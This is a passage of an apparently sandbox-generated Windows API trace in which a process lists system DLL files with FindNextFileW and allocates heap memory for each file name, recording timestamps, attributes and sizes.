FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb859c590, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb859c590, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-timezone-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.919] lstrlenW (lpString="api-ms-win-core-timezone-l1-1-0.dll") returned 35 [0025.919] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc8) returned 0x5cef70 [0025.919] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d21b931, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d21b931, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d21a280, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-util-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.919] lstrlenW (lpString="api-ms-win-core-util-l1-1-0.dll") returned 31 [0025.919] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc0) returned 0x5cf040 [0025.919] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d9fe1dc, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d9fe1dc, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d9fd330, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.919] lstrlenW (lpString="api-ms-win-core-xstate-l1-1-0.dll") returned 33 [0025.919] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5cf108 [0025.919] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-core-xstate-l2-1-0.dll", cAlternateFileName="")) returned 1 [0025.919] lstrlenW (lpString="api-ms-win-core-xstate-l2-1-0.dll") returned 33 [0025.920] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5cf1d8 [0025.920] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8cc12b9, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-conio-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.920] lstrlenW (lpString="api-ms-win-crt-conio-l1-1-0.dll") returned 31 [0025.920] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc0) returned 0x5cf2a8 [0025.920] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb852a170, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb852a170, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.920] lstrlenW (lpString="api-ms-win-crt-convert-l1-1-0.dll") returned 33 [0025.920] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5cf370 [0025.920] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8504010, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8504010, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.920] lstrlenW (lpString="api-ms-win-crt-environment-l1-1-0.dll") returned 37 [0025.920] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xcc) returned 0x5cf440 [0025.920] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb852a170, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb852a170, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-filesystem-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.920] lstrlenW (lpString="api-ms-win-crt-filesystem-l1-1-0.dll") returned 36 [0025.920] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xca) returned 0x5cf530 [0025.921] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-heap-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.921] lstrlenW (lpString="api-ms-win-crt-heap-l1-1-0.dll") returned 30 [0025.921] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xbe) returned 0x5d1518 [0025.921] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8491bf0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8491bf0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8ce741a, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-locale-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.921] lstrlenW (lpString="api-ms-win-crt-locale-l1-1-0.dll") returned 32 [0025.921] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc2) returned 0x5d15f8 [0025.921] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb846ba90, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb846ba90, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x5760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-math-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.921] lstrlenW (lpString="api-ms-win-crt-math-l1-1-0.dll") returned 30 [0025.921] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xbe) returned 0x5d35e0 [0025.921] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8445930, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8445930, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-multibyte-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.921] lstrlenW (lpString="api-ms-win-crt-multibyte-l1-1-0.dll") returned 35 [0025.921] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc8) returned 0x5d16c8 [0025.921] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8125c50, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8125c50, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d0d57b, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x10360, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-private-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.921] lstrlenW (lpString="api-ms-win-crt-private-l1-1-0.dll") returned 33 [0025.921] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5d1798 [0025.921] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3160, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-process-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.922] lstrlenW (lpString="api-ms-win-crt-process-l1-1-0.dll") returned 33 [0025.922] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5d1868 [0025.922] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84b7d50, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84b7d50, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-runtime-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.922] lstrlenW (lpString="api-ms-win-crt-runtime-l1-1-0.dll") returned 33 [0025.922] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5d1938 [0025.922] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-stdio-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.922] lstrlenW (lpString="api-ms-win-crt-stdio-l1-1-0.dll") returned 31 [0025.922] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc0) returned 0x5d36a8 [0025.922] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb85502d0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb85502d0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d336dc, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-string-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.922] lstrlenW (lpString="api-ms-win-crt-string-l1-1-0.dll") returned 32 [0025.922] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc2) returned 0x5d1a08 [0025.922] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84ddeb0, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb84ddeb0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x3760, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.922] lstrlenW (lpString="api-ms-win-crt-time-l1-1-0.dll") returned 30 [0025.922] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xbe) returned 0x5d3770 [0025.922] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8576430, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8576430, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-crt-utility-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.923] lstrlenW (lpString="api-ms-win-crt-utility-l1-1-0.dll") returned 33 [0025.923] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc4) returned 0x5d1ad8 [0025.923] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8504010, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xb8504010, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xd8d5983d, ftLastWriteTime.dwHighDateTime=0x1d0c15a, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-eventing-provider-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.923] lstrlenW (lpString="api-ms-win-eventing-provider-l1-1-0.dll") returned 39 [0025.923] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd0) returned 0x5cf608 [0025.923] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1833b5, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1833b5, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x2d1a7690, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-base-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.923] lstrlenW (lpString="api-ms-win-security-base-l1-1-0.dll") returned 35 [0025.923] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc8) returned 0x5d1ba8 [0025.923] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4f381b9f, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x4f381b9f, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x4f37fbd0, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-lsalookup-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.923] lstrlenW (lpString="api-ms-win-security-lsalookup-l1-1-0.dll") returned 40 [0025.924] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd2) returned 0x5d3838 [0025.924] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4f3a7cfe, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x4f3a7cfe, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0x4f3a6cd0, ftLastWriteTime.dwHighDateTime=0x1ca040f, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-security-sddl-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.924] lstrlenW (lpString="api-ms-win-security-sddl-l1-1-0.dll") returned 35 [0025.924] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc8) returned 0x5d1c78 [0025.924] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d15d256, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d15d256, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-core-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.924] lstrlenW (lpString="api-ms-win-service-core-l1-1-0.dll") returned 34 [0025.924] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xc6) returned 0x5d1d48 [0025.924] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d1370f7, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d1370f7, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-management-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.924] lstrlenW (lpString="api-ms-win-service-management-l1-1-0.dll") returned 40 [0025.924] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd2) returned 0x5d3918 [0025.924] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d09eb7b, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d09eb7b, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-management-l2-1-0.dll", cAlternateFileName="")) returned 1 [0025.924] lstrlenW (lpString="api-ms-win-service-management-l2-1-0.dll") returned 40 [0025.924] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xd2) returned 0x5d39f8 [0025.924] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x2d267bef, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2d267bef, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf25d2100, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="api-ms-win-service-winsvc-l1-1-0.dll", cAlternateFileName="")) returned 1 [0025.924] lstrlenW (lpString="api-ms-win-service-winsvc-l1-1-0.dll") returned 36 [0025.924] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xca) returned 0x5cf6e0 [0025.924] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7821a163, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x7821a163, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apilogen.dll", cAlternateFileName="")) returned 1 [0025.924] lstrlenW (lpString="apilogen.dll") returned 12 [0025.925] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d3ad8 [0025.925] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1f2f92c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xc1f2f92c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x36000, dwReserved0=0x0, dwReserved1=0x0, cFileName="apircl.dll", cAlternateFileName="")) returned 1 [0025.925] lstrlenW (lpString="apircl.dll") returned 10 [0025.925] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x96) returned 0x5d3b80 [0025.925] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2de74afe, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2de74afe, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf261dbf0, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="apisetschema.dll", cAlternateFileName="")) returned 1 [0025.925] lstrlenW (lpString="apisetschema.dll") returned 16 [0025.925] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xa2) returned 0x5d3c20 [0025.925] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92c3856c, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x92c3856c, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x92c5e6cc, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x48400, dwReserved0=0x0, dwReserved1=0x0, cFileName="apphelp.dll", cAlternateFileName="")) returned 1 [0025.925] lstrlenW (lpString="apphelp.dll") returned 11 [0025.925] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x98) returned 0x5d3cd0 [0025.925] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a4c40da, ftCreationTime.dwHighDateTime=0x1ca0410, ftLastAccessTime.dwLowDateTime=0x7a4c40da, ftLastAccessTime.dwHighDateTime=0x1ca0410, ftLastWriteTime.dwLowDateTime=0x7e595a10, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Apphlpdm.dll", cAlternateFileName="")) returned 1 [0025.925] lstrlenW (lpString="Apphlpdm.dll") returned 12 [0025.925] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d3d70 [0025.925] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc6b7842, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xcc6b7842, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7e608600, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc600, dwReserved0=0x0, dwReserved1=0x0, cFileName="appidapi.dll", cAlternateFileName="")) returned 1 [0025.925] lstrlenW (lpString="appidapi.dll") returned 12 [0025.925] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x9a) returned 0x5d3e18 [0025.925] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd29cc968, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xd29cc968, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7e6540f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x31a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppIdPolicyEngineApi.dll", cAlternateFileName="")) returned 1 [0025.925] lstrlenW (lpString="AppIdPolicyEngineApi.dll") returned 24 [0025.926] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0xb2) returned 0x5d3ec0 [0025.926] FindNextFileW (in: hFindFile=0x5cb1f8, lpFindFileData=0x5cafa0 | out: lpFindFileData=0x5cafa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98006f9, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x98006f9, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7e6c6ce0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24800, dwReserved0=0x0, 